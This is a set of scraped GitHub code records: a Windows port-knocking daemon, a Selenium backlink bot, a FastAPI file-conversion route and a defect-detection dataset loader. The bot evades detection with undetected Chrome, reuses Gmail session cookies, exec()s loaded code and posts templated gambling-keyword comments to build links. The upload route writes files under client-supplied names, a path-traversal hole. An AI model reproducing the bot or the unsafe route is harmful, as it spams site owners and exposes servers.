the first symbol of equal\r\n key = pair[0].strip()\r\n value = pair[1].strip()\r\n if key == \"sequence\":\r\n config[name][key] = [ int(s.strip()) for s in value.split(',')]\r\n else:\r\n config[name][key] = value\r\n \r\n if args.debug:\r\n for key in config:\r\n for p in config[key]['sequence']:\r\n all_port[p] = config[key]['protocol']\r\n \r\n if args.debug: \r\n print(f'=========== config ===========')\r\n for i, (key, value) in enumerate(config.items()):\r\n for sub_key, sub_value in value.items():\r\n print(f\"{i} [{key}]: {sub_key}: {sub_value}\")\r\n print()\r\n print(f'==============================')\r\n print(f'All used port: {all_port}\\n')\r\n return config \r\n\r\ndef match_exec(q, packet):\r\n if not q.sequence:\r\n if re.search('\\%[a-zA-Z0-9]+\\%', q.command):\r\n q.command = re.sub(r'\\%[a-zA-Z0-9]+\\%', packet.src_addr, q.command)\r\n os.system(q.command)\r\n if args.debug: print(f\"[+] Execute: {q.command}\")\r\n return True\r\n return False\r\n\r\ndef match_first(start, protocol, packet):\r\n for key, rule in config.items():\r\n if packet.dst_port == rule['sequence'][0] and protocol == rule['protocol']:\r\n tmp = candidate(key, start, start+int(rule['seq_timeout']), rule['sequence'][1:], rule['command'], rule['protocol'], packet.src_addr)\r\n if not match_exec(tmp, packet):\r\n match_queue.append(tmp)\r\n \r\ndef match_seq(start, protocol, packet):\r\n remove_list = []\r\n for q in match_queue:\r\n if q.start == start: continue\r\n if q.end < start: \r\n remove_list.append(q)\r\n continue\r\n if q.sequence[0] == packet.dst_port and packet.src_addr == q.src_addr and protocol == q.protocol:\r\n q.sequence = q.sequence[1:]\r\n if match_exec(q, packet):\r\n remove_list.append(q)\r\n \r\n for q in remove_list:\r\n match_queue.remove(q)\r\n \r\ndef port_knockd():\r\n w = pydivert.WinDivert()\r\n w.open()\r\n while(True):\r\n packet = w.recv()\r\n start = time.time()\r\n if \"INBOUND\" in str(packet.direction) and packet.interface[0] in selected_interface:\r\n \r\n # get protocol\r\n protocol = None\r\n if packet.tcp:\r\n protocol = 'tcp'\r\n else:\r\n protocol = 'udp'\r\n \r\n # debug message\r\n if args.debug:\r\n for key in all_port:\r\n if packet.dst_port == key and protocol == all_port[key]:\r\n print(f\"{time.ctime(start)}: {protocol} {packet.src_addr}:{packet.src_port}->{packet.dst_addr}:{packet.dst_port}\")\r\n \r\n # rule \r\n match_first(start, protocol, packet)\r\n match_seq(start, protocol, packet)\r\n w.send(packet)\r\n w.close()\r\n \r\nif __name__ == \"__main__\":\r\n get_interface()\r\n read_config()\r\n # TODO: hidden window\r\n # Start-Process -verb runAs \"python\" -WindowStyle hidden\r\n port_knockd()", "repo_name": "KJ-black/windows-knock", "sub_path": "knockd.py", "file_name": "knockd.py", "file_ext": "py", "file_size_in_byte": 6401, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "dataclasses.dataclass", "line_number": 12, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 20, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 30, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 36, "usage_type": "call"}, {"api_name": "subprocess.getoutput", "line_number": 65, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 79, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 89, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 100, "usage_type": "call"}, 
{"api_name": "re.search", "line_number": 104, "usage_type": "call"}, {"api_name": "re.search", "line_number": 135, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 136, "usage_type": "call"}, {"api_name": "os.system", "line_number": 137, "usage_type": "call"}, {"api_name": "pydivert.WinDivert", "line_number": 165, "usage_type": "call"}, {"api_name": "time.time", "line_number": 169, "usage_type": "call"}, {"api_name": "time.ctime", "line_number": 183, "usage_type": "call"}]} +{"seq_id": "19494186585", "text": "import os\nimport time\nimport json\nimport random\nfrom datetime import datetime\nimport undetected_chromedriver as uc # Undetected Chrome\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.proxy import Proxy, ProxyType\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import InvalidCookieDomainException, UnableToSetCookieException, TimeoutException\n\n\n# Multiprotcessing\nfrom multiprocessing import Pool\n# Links: Завантаження інструкцій\nfrom baza_links.web2_0 import websites\n# Function: Gmail\nfrom gmail_login import login_to_gmail\nfrom gmail_autorization import gmail_autoriz_fun\n# Function: Captcha\nfrom captcha_img import process_image\n# Function: Формуэмо Частотну фразу Тайтл в Боді\nfrom most_frequent_phrase import most_frequent_phrase\n# Function: OpenAi promt\nfrom def_OpenAi_promt import promt_openai\n\n# База шаблонів коментарів\nfrom baza_template_comments.templ_comments_en import comments_prompt\n\n\n# Нинішній розділ\ncurrent_folder = os.path.basename(os.path.dirname(__file__))\n\n# Дата - вивод в форматі: 10-06-2023\ncurrent_date = datetime.now()\nformatted_date = current_date.strftime('%d-%m-%Y')\n\n# EMAIL Google\nwith open(f'{current_folder}\\\\email\\\\email.json') as json_file:\n email_json = json.load(json_file)\n\n# USER-AGENT\nuser_agent = ['Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36']\n\n# TODO: COOKIES\n# cookies- Шлях до файлу з куками\nCOOKIES_FOLDER_PATH = os.path.join(current_folder, 'cookies')\n# cookies- Функція для завантаження cookies\ndef load_cookies(driver, email):\n try:\n cookie_file = os.path.join(COOKIES_FOLDER_PATH, f'{email}.json')\n if os.path.exists(cookie_file):\n with open(cookie_file, 'r') as file:\n cookies = json.load(file)\n for cookie in cookies:\n # if 'expiry' in cookie:\n # del cookie['expiry']\n try:\n driver.add_cookie(cookie)\n print(f'Cookies loaded for {email}.')\n except (InvalidCookieDomainException, UnableToSetCookieException) as e:\n print((f\"Error loading cookies for {email}: {e}\"))\n continue\n \n except (OSError, IOError):\n print(f\"No cookie file found for {email}.\")\n\n# cookies- Функція для збереження cookies\ndef save_cookies(driver, email):\n cookie_file = os.path.join(COOKIES_FOLDER_PATH, f'{email}.json')\n # Зберігаємо 
файли cookie у вигляді набору, щоб видалити дублікати\n cookies_set = {json.dumps(cookie) for cookie in driver.get_cookies()}\n # Перетворюємо набір назад у список\n cookies_list = [json.loads(cookie) for cookie in cookies_set]\n with open(cookie_file, 'w') as file:\n json.dump(cookies_list, file)\n print(f'Cookies saved for {email}.')\n\n\n# Функція для виконання інструкцій\ndef execute_instructions(driver, url, instructions, **email_json_info):\n my_wait = WebDriverWait(driver, 10) # ожидание до 10 секунд\n\n # Мій Чистий Сайт без \"https://\" i \"/\"\n site_url = email_json_info['site_url']\n clean_site_url = site_url.split(\"//\")[1].split(\"/\")[0]\n\n # Перехід до веб-сайту\n driver.get(url)\n\n # Текст з тега \n title_text = driver.title\n # Извлекаем текст из body\n body_text = driver.find_element(By.CSS_SELECTOR, \"body\").text\n # Отримуємо самий частотний вираз біграмми і триграмми\n frequent_phrase_title = most_frequent_phrase(title_text, body_text)\n\n # Випадковий ключове слово з поля \"keys\": [\"House\", \"slot game\"]\n random_key_poisk = random.choice(email_json_info[\"keys\"])\n\n # Создаем коментарий из промта\n # comment_ai = promt_openai(site_url, title_url, random_key_poisk)\n comment = random.choice(comments_prompt)\n comment = comment.format(title_url=frequent_phrase_title, key_game=random_key_poisk)\n\n for _ in range(3): # Вводим цикл для повторения до 3 раз\n for instruction in instructions:\n action, code = list(instruction.items())[0]\n\n # Виконуємо код інструкції, використовуючи exec. Зауважте, що це може бути потенційно небезпечно,\n # якщо інструкції не є надійними, оскільки exec виконує будь-який переданий йому код.\n try:\n exec(code)\n except Exception as e:\n print(f\"Error executing instruction '{action}': {e}\")\n continue\n print(f\"Attempted instructions for {url}\")\n \n # Обновляем страницу и ждем ее загрузки\n driver.refresh()\n time.sleep(3) # Даем время странице на загрузку, можно заменить на WebDriverWait, если нужно\n\n # Перевіряємо наявність тексту \"author\" на сторінці\n \n if clean_site_url in driver.page_source:\n # Додаємо URL до файлу, якщо текст знайдено\n with open(f'{current_folder}\\\\final_result_links\\\\{formatted_date}_{clean_site_url}.txt', 'a') as file:\n file.write(f\"{url}\\n\")\n break # Если \"author\" найден, прерываем цикл\n else:\n print(f\"Url not found, retrying for {url}\")\n \n if clean_site_url not in driver.page_source:\n print(f\"Failed to find URL in {url} after 3 attempts\")\n \n\n# Функція для обробки інструкцій\ndef process_instructions(email_json_info):\n # Витягуємо логін і пароль з вхідного словника\n email = email_json_info[\"login\"]\n password = email_json_info[\"password\"]\n\n # Ініціалізуємо веб-драйвер Chrome\n # Chrome Options\n chrome_options = Options()\n chrome_options.add_argument(f\"user-agent={random.choice(user_agent)}\") # User-agent\n # chrome_options.add_argument(\"--blink-settings=imagesEnabled=false\") # Отключение отображения изображений (опционально)\n chrome_options.add_argument(\"--disable-notifications\") # Отключение уведомлений (опционально)\n # Chrome Service\n ser = Service(executable_path = f\"{current_folder}\\\\Webdriver_Chrome\\\\114-0-5735-90\\\\chromedriver.exe\")\n driver = uc.Chrome(service=ser, options=chrome_options) # Undetected Chrome\n driver.maximize_window() # Chrome Вікно відкрити максимально\n\n # TODO: GMAIL - Переходимо на сторінку Gmail\n storinka_gmail_vhid = \"https://mail.google.com\"\n driver.get(storinka_gmail_vhid)\n \n # COOKIES LOAD - Завантажуємо 
файли cookie\n load_cookies(driver, email)\n time.sleep(1)\n # Оновлюємо сторінку\n driver.refresh()\n time.sleep(2)\n\n # Якщо поточний URL не \"mail.google.com\" виконуємо вхід\n if storinka_gmail_vhid not in driver.current_url:\n login_to_gmail(driver, email, password)\n # Зберігаємо файли cookie після входу в gmail\n save_cookies(driver, email)\n driver.refresh() # Оновлюємо сторінку\n time.sleep(3)\n\n # TODO: Виконуємо інструкції для кожного URL\n for url, instructions in websites.items():\n execute_instructions(driver, url, instructions, **email_json_info)\n # Зберігаємо файли cookie\n save_cookies(driver, email)\n driver.refresh() # Оновлюємо сторінку\n time.sleep(2) # чекаємо, поки сторінка завантажиться\n\n # Закриваємо драйвер\n driver.quit()\n\n\n# Використовуємо бібліотеку multiprocessing, щоб запустити обробку інструкцій для кожної електронної пошти паралельно\n# if __name__ == '__main__':\n# with Pool(5) as p:\n# p.map(process_instructions, email_json.values())\n\n# Без multiprocessing\nif __name__ == '__main__':\n for email_info in email_json.values():\n process_instructions(email_info)", "repo_name": "xxx1285/Deepl_Python", "sub_path": "Linkbilding_Selenium/main8 undetected chrome.py", "file_name": "main8 undetected chrome.py", "file_ext": "py", "file_size_in_byte": 9637, "program_lang": "python", "lang": "uk", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.basename", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "name"}, {"api_name": "json.load", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 62, "usage_type": "call"}, {"api_name": "selenium.common.exceptions.InvalidCookieDomainException", "line_number": 69, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.UnableToSetCookieException", "line_number": 69, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 80, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 82, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 84, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 90, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 102, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 102, "usage_type": "name"}, {"api_name": "most_frequent_phrase.most_frequent_phrase", "line_number": 104, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 107, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 111, "usage_type": "call"}, {"api_name": 
"baza_template_comments.templ_comments_en.comments_prompt", "line_number": 111, "usage_type": "argument"}, {"api_name": "time.sleep", "line_number": 129, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 153, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 154, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.service.Service", "line_number": 158, "usage_type": "call"}, {"api_name": "undetected_chromedriver.Chrome", "line_number": 159, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 168, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 171, "usage_type": "call"}, {"api_name": "gmail_login.login_to_gmail", "line_number": 175, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 179, "usage_type": "call"}, {"api_name": "baza_links.web2_0.websites.items", "line_number": 182, "usage_type": "call"}, {"api_name": "baza_links.web2_0.websites", "line_number": 182, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 187, "usage_type": "call"}]} +{"seq_id": "22656749471", "text": "from fastapi import APIRouter, UploadFile, File\n\nfrom services.excel_to_csv import excel_to_csv\n\n# Metadata for the swagger documentation\nrouter = APIRouter(\n prefix=\"\",\n tags=[\"ExcelTOCSV\"]\n)\n\n\n# Include routers\n@router.post(\"/excel_to_csv\", summary=\"Endpoint for excel to csv converter\")\ndef excel_to_csv_api(file: UploadFile = File(...)):\n try:\n contents = file.file.read()\n file_name = f\"Data/{file.filename}\"\n with open(file_name, 'wb') as f:\n f.write(contents)\n except Exception:\n return {\"message\": \"There was an error uploading the file\"}\n finally:\n file.file.close()\n extracted_data = excel_to_csv(file_name)\n return str(extracted_data)\n", "repo_name": "usama124/image-text-extractor", "sub_path": "routers/excel_to_csv_router.py", "file_name": "excel_to_csv_router.py", "file_ext": "py", "file_size_in_byte": 713, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "fastapi.APIRouter", "line_number": 6, "usage_type": "call"}, {"api_name": "fastapi.UploadFile", "line_number": 14, "usage_type": "name"}, {"api_name": "fastapi.File", "line_number": 14, "usage_type": "call"}, {"api_name": "services.excel_to_csv.excel_to_csv", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "20155313174", "text": "import xml.dom.minidom as minidom\n\nimport os\nimport os.path as osp\nfrom PIL import Image\nimport numpy as np\nimport scipy.sparse\nimport subprocess\nimport pickle as cPickle\nimport uuid\nimport xml.etree.ElementTree as ET\n\nfrom lib.datasets.imdb import imdb\nfrom lib.networks.netconfig import cfg\n\n\nclass siammask_data(imdb):\n def __init__(self, image_set, devkit_path=None):\n imdb.__init__(self, 'siammask_data_' + image_set)\n self._image_set = image_set\n self._devkit_path = self._get_default_path() if devkit_path is None \\\n else devkit_path\n self._data_path = os.path.join(self._devkit_path, 'siammask_data')\n\n self._classes = ['__background__'] + cfg.SIAMSE.CLASSES\n self.defect = cfg.SIAMSE.CLASSES\n self._class_to_ind = dict(zip(self.classes, range(self.num_classes)))\n self._image_ext = '.bmp'\n self._image_index = self._load_image_set_index()\n\n self._roidb_handler = self.gt_roidb\n self.templatedb = self.get_templatedb()\n\n self._shuffle_inds()\n self._salt = str(uuid.uuid4())\n self._comp_id = 'comp4'\n\n # PASCAL specific config options\n self.config = 
{'cleanup': True,\n                       'use_salt': True,\n                       'use_diff': False,\n                       'matlab_eval': False,\n                       'rpn_file': None,\n                       'min_size': 2}\n\n        assert os.path.exists(self._devkit_path), \\\n            'ZLRMdevkit path does not exist: {}'.format(self._devkit_path)\n        assert os.path.exists(self._data_path), \\\n            'Path does not exist: {}'.format(self._data_path)\n\n    def cache_path(self):\n        cache_path = osp.abspath(osp.join(cfg.SIAMSE.DATA_DIR, 'siammask_data', 'datasets', 'cache'))\n        if not os.path.exists(cache_path):\n            os.makedirs(cache_path)\n        return cache_path\n\n    # ===================================== fetch images =============================================\n    def image_path_at(self, i):\n        \"\"\"\n        Return the absolute path to image i in the image sequence.\n        \"\"\"\n        return self.image_path_from_index(self._image_index[i])\n\n    def image_path_from_index(self, index):\n        \"\"\"\n        Construct an image path from the image's \"index\" identifier.\n        \"\"\"\n        image_path = os.path.join(self._data_path, 'datasets', 'ImageSets',\n                                  index + self._image_ext)\n        assert os.path.exists(image_path), \\\n            'Path does not exist: {}'.format(image_path)\n        return image_path\n\n    def _load_image_set_index(self):\n        \"\"\"\n        Load the indexes listed in this dataset's image set file.\n        \"\"\"\n        # Example path to image set file:\n        # self._devkit_path + /VOCdevkit2007/VOC2007/ImageSets/Main/val.txt\n        image_set_file = os.path.join(self._data_path, 'datasets', 'main',\n                                      self._image_set + '.txt')\n        assert os.path.exists(image_set_file), \\\n            'Path does not exist: {}'.format(image_set_file)\n        with open(image_set_file) as f:\n            image_index = [x.strip() for x in f.readlines()]\n        return image_index\n\n    def _get_default_path(self):\n        \"\"\"\n        Return the default path where PASCAL VOC is expected to be installed.\n        \"\"\"\n        return os.path.join(cfg.SIAMSE.DATA_DIR)\n\n\n\n\n    # ================================= fetch ROIs ==========================================\n    def gt_roidb(self):\n        \"\"\"\n        Return the database of ground-truth regions of interest.\n\n        This function loads/saves from/to a cache file to speed up future calls.\n        \"\"\"\n        cache_file = os.path.join(self.cache_path(), self.name + '_gt_roidb.pkl')\n        if os.path.exists(cache_file):\n            with open(cache_file, 'rb') as fid:\n                roidb = cPickle.load(fid)\n            print('{} gt roidb loaded from {}'.format(self.name, cache_file))\n            return roidb\n        gt_roidb = [self._load_zlrm_annotation(index)\n                    for index in self.image_index]\n        with open(cache_file, 'wb') as fid:\n            cPickle.dump(gt_roidb, fid, cPickle.HIGHEST_PROTOCOL)\n        print('wrote gt roidb to {}'.format(cache_file))\n\n        return gt_roidb\n\n\n    def _load_zlrm_annotation(self, index):\n        \"\"\"\n        Load image and bounding boxes info from XML file in the PASCAL VOC\n        format.\n        \"\"\"\n        filename = os.path.join(self._data_path, 'Annotations', index + '.xml')\n        tree = ET.parse(filename)\n        objs = tree.findall('object')\n        num_objs = len(objs)\n\n        # boxes = np.zeros((num_objs, 4), dtype=np.uint16)\n        # gt_classes = np.zeros((num_objs), dtype=np.int32)\n        # overlaps = np.zeros((num_objs, self.num_classes), dtype=np.float32)\n        # # \"Seg\" area for pascal is just the box area\n        # seg_areas = np.zeros((num_objs), dtype=np.float32)\n        # ishards = np.zeros((num_objs), dtype=np.int32)\n        boxes = []\n        gt_classes = []\n        overlaps = []\n        seg_areas = []\n        ishards = []\n\n        # Load object bounding boxes into a data frame.\n        for ix, obj in enumerate(objs):\n            diffc = obj.find('difficult')\n            difficult = 0 if diffc is None else int(diffc.text)\n            # ishards[ix] = difficult\n\n            if (obj.find('name').text in 
cfg.SIAMSE.CLASSES) and difficult == 0:\n                bbox = obj.find('bndbox')\n                # Make pixel indexes 0-based\n                x1 = float(bbox.find('xmin').text) - 1\n                y1 = float(bbox.find('ymin').text) - 1\n                x2 = float(bbox.find('xmax').text) - 1\n                y2 = float(bbox.find('ymax').text) - 1\n\n\n                if cfg.SIAMSE.N_CLASSES == 1:\n                    cls = self._class_to_ind['defect'.lower().strip()]\n                else:\n                    cls = self._class_to_ind[obj.find('name').text.lower().strip()]\n                boxes.append([x1, y1, x2, y2])\n                gt_classes.append(cls)\n                overlap = np.zeros((self.num_classes), dtype=np.float32)\n                overlap[cls] = 1.0\n                overlaps.append(overlap)\n                seg_areas.append((x2 - x1 + 1) * (y2 - y1 + 1))\n                ishards.append(difficult)\n\n        boxes = np.array(boxes, dtype=np.uint16).reshape((-1, 4))\n        gt_classes = np.array(gt_classes, dtype=np.int32).reshape(-1)\n        overlaps = np.array(overlaps, dtype=np.float32).reshape((-1, self.num_classes))\n        seg_areas = np.array(seg_areas, dtype=np.float32).reshape(-1)\n        ishards = np.array(ishards, dtype=np.int32).reshape(-1)\n\n        overlaps = scipy.sparse.csr_matrix(overlaps)\n\n        return {'boxes': boxes,\n                'gt_classes': gt_classes,\n                'gt_ishard': ishards,\n                'gt_overlaps': overlaps,\n                'flipped': False,\n                'seg_areas': seg_areas}\n\n    # ================================= fetch template data ==========================================\n    def _shuffle_inds(self):\n        self._perm = {}\n        self._cur = {}\n        for classes in self.defect:\n            self._shuffle_inds_classes(classes)\n\n    def _shuffle_inds_classes(self, classes):\n\n        self._perm[classes] = np.random.permutation(np.arange(len(self.templatedb[classes])))\n        self._cur[classes] = 0\n\n    def _get_next_template_inds(self):\n        db_inds = {}\n        for classes in self.defect:\n            if self._cur[classes] + 1 >= len(self.templatedb[classes]):\n                self._shuffle_inds_classes(classes)\n\n            db_inds[classes] = self._perm[classes][self._cur[classes]:self._cur[classes] + 1]\n        return db_inds\n\n    def _get_next_template_minibatch(self):\n        \"\"\"Return the blobs to be used for the next minibatch.\n\n        If cfg.TRAIN.USE_PREFETCH is True, then blobs will be computed in a\n        separate process and made available through self._blob_queue.\n        \"\"\"\n\n        db_inds = self._get_next_template_inds()\n        template = []\n        for classes in self.defect:\n            template_image = crop_template(self.templatedb[classes][db_inds[classes][0]]['image_path'],\n                                           self.templatedb[classes][db_inds[classes][0]]['boxes'][0:4])\n            template.append(template_image)\n\n        template = np.stack(template, axis=0)\n\n        return template\n\n    def template(self):\n        \"\"\"Get blobs and copy them into this layer's top blob vector.\"\"\"\n        template = self._get_next_template_minibatch()\n        # blob dict with 3 elements: im_name, data, label\n        return template\n\n    # export all templates\n    def template_all(self):\n        path = 'D:\\\\jjj\\\\zlrm\\\\data\\\\siammask_data\\\\datasets\\\\template'\n        for classes in self.defect:\n            print(classes, 'start')\n            for i in range(len(self.templatedb[classes])):\n                crop_template_(self.templatedb[classes][i]['image_path'],\n                               self.templatedb[classes][i]['boxes'][0:4], str(i), os.path.join(path, classes))\n\n\n    def get_templatedb(self):\n        templatedb = {}\n        cache_file = os.path.join(self.cache_path(), self.name + '_template_imagedb.pkl')\n        if os.path.exists(cache_file):\n            with open(cache_file, 'rb') as fid:\n                templatedb = cPickle.load(fid)\n            print('{} gt templatedb loaded from {}'.format(self.name, cache_file))\n            return templatedb\n\n        for classes in self._classes:\n            templatedb[classes] = []\n            for index in self.image_index:\n                templatedb[classes] = templatedb[classes] + self._load_template(index, classes)\n\n        with 
open(cache_file, 'wb') as fid:\n            cPickle.dump(templatedb, fid, cPickle.HIGHEST_PROTOCOL)\n        print('wrote gt templatedb to {}'.format(cache_file))\n\n        return templatedb\n\n    def _load_template(self, index, classes):\n        \"\"\"\n        Load image and bounding boxes info from XML file in the PASCAL VOC\n        format.\n        \"\"\"\n        filename = os.path.join(self._data_path, 'Annotations', index + '.xml')\n        tree = ET.parse(filename)\n        objs = tree.findall('object')\n\n        template_classes = []\n        # Load object bounding boxes into a data frame.\n        for ix, obj in enumerate(objs):\n            diffc = obj.find('difficult')\n            difficult = 0 if diffc is None else int(diffc.text)\n            # ishards[ix] = difficult\n\n            if difficult == 0 and obj.find('name').text == classes:\n                template_classes_ = {}\n                bbox = obj.find('bndbox')\n                # Make pixel indexes 0-based\n                x1 = float(bbox.find('xmin').text) - 1\n                y1 = float(bbox.find('ymin').text) - 1\n                x2 = float(bbox.find('xmax').text) - 1\n                y2 = float(bbox.find('ymax').text) - 1\n\n                cls = self._class_to_ind[obj.find('name').text.lower().strip()]\n                boxes = [x1, y1, x2, y2, cls]\n                template_classes_['boxes'] = np.array(boxes, dtype=np.uint16)\n                template_classes_['image_path'] = self.image_path_from_index(index)\n                template_classes.append(template_classes_)\n\n        return template_classes\n\n# can read images whose paths contain Chinese characters\ndef imread(file_path):\n    im = np.array(Image.open(file_path))\n    if len(im.shape) == 2:\n        c = []\n        for i in range(3):\n            c.append(im)\n        im = np.asarray(c)\n        im = im.transpose([1, 2, 0])\n    return im\n\ndef crop_template(image_path, boxes):\n    im = Image.open(image_path)\n    template_crop = im.crop(boxes)\n    w = int(boxes[2] - boxes[0])\n    h = int(boxes[3] - boxes[1])\n    if h > 120:\n        w = int(w / (h / 120))\n        h = 120\n    if w > 120:\n        h = int(h / (w / 120))\n        w = 120\n    template_resize = template_crop.resize((w, h), Image.ANTIALIAS)\n    background = Image.new('L', cfg.SIAMSE.TEMPLATE_IMAGE_SIZE, (138))\n    template_resize_arr = np.array(template_resize)\n    background_arr = np.array(background)\n\n\n    y1 = int(background_arr.shape[0] / 2 - template_resize_arr.shape[0] / 2)\n    x1 = int(background_arr.shape[1] / 2 - template_resize_arr.shape[1] / 2)\n    y2 = int(y1 + template_resize_arr.shape[0])\n    x2 = int(x1 + template_resize_arr.shape[1])\n    background_arr[y1:y2, x1:x2] = template_resize_arr\n\n    b = Image.fromarray(background_arr.astype(np.uint8))\n    outpath = os.path.join('D:\\data', 'test.bmp')\n    b.save(outpath)\n\n    c = []\n    for i in range(3):\n        c.append(background_arr)\n    background_arr = np.asarray(c)\n    background_arr = background_arr.transpose([1, 2, 0])\n    background_arr = background_arr.astype(np.float32, copy=False)\n    background_arr -= cfg.SIAMSE.PIXEL_MEANS\n    return background_arr\ndef crop_template_(image_path, boxes, save_name, path):\n    im = Image.open(image_path)\n    template_crop = im.crop(boxes)\n    w = int(boxes[2] - boxes[0])\n    h = int(boxes[3] - boxes[1])\n\n    if h > 120:\n        w = int(w / (h / 120))\n        h = 120\n    if w > 120:\n        h = int(h / (w / 120))\n        w = 120\n    template_resize = template_crop.resize((w, h), Image.ANTIALIAS)\n    background = Image.new('L', cfg.SIAMSE.TEMPLATE_IMAGE_SIZE, (138))\n    template_resize_arr = np.array(template_resize)\n    background_arr = np.array(background)\n\n\n    y1 = int(background_arr.shape[0] / 2 - template_resize_arr.shape[0] / 2)\n    x1 = int(background_arr.shape[1] / 2 - template_resize_arr.shape[1] / 2)\n    y2 = int(y1 + template_resize_arr.shape[0])\n    x2 = int(x1 + template_resize_arr.shape[1])\n    background_arr[y1:y2, x1:x2] = template_resize_arr\n\n    b = Image.fromarray(background_arr.astype(np.uint8))\n    if not 
os.path.exists(path):\n os.mkdir(path)\n outpath = os.path.join(path, save_name + '.bmp')\n b.save(outpath)\n\nif __name__ == '__main__':\n\n siammask = siammask_data('train')\n siammask.template_all()", "repo_name": "juzisedefeimao/cv", "sub_path": "lib/datasets/siammask.py", "file_name": "siammask.py", "file_ext": "py", "file_size_in_byte": 14000, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "lib.datasets.imdb.imdb", "line_number": 17, "usage_type": "name"}, {"api_name": "lib.datasets.imdb.imdb.__init__", "line_number": 19, "usage_type": "call"}, {"api_name": "lib.datasets.imdb.imdb", "line_number": 19, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg.SIAMSE", "line_number": 25, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg", "line_number": 25, "usage_type": "name"}, {"api_name": "lib.networks.netconfig.cfg.SIAMSE", "line_number": 26, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg", "line_number": 26, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "lib.networks.netconfig.cfg.SIAMSE", "line_number": 52, "usage_type": "attribute"}, {"api_name": "lib.networks.netconfig.cfg", "line_number": 52, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.path.join", 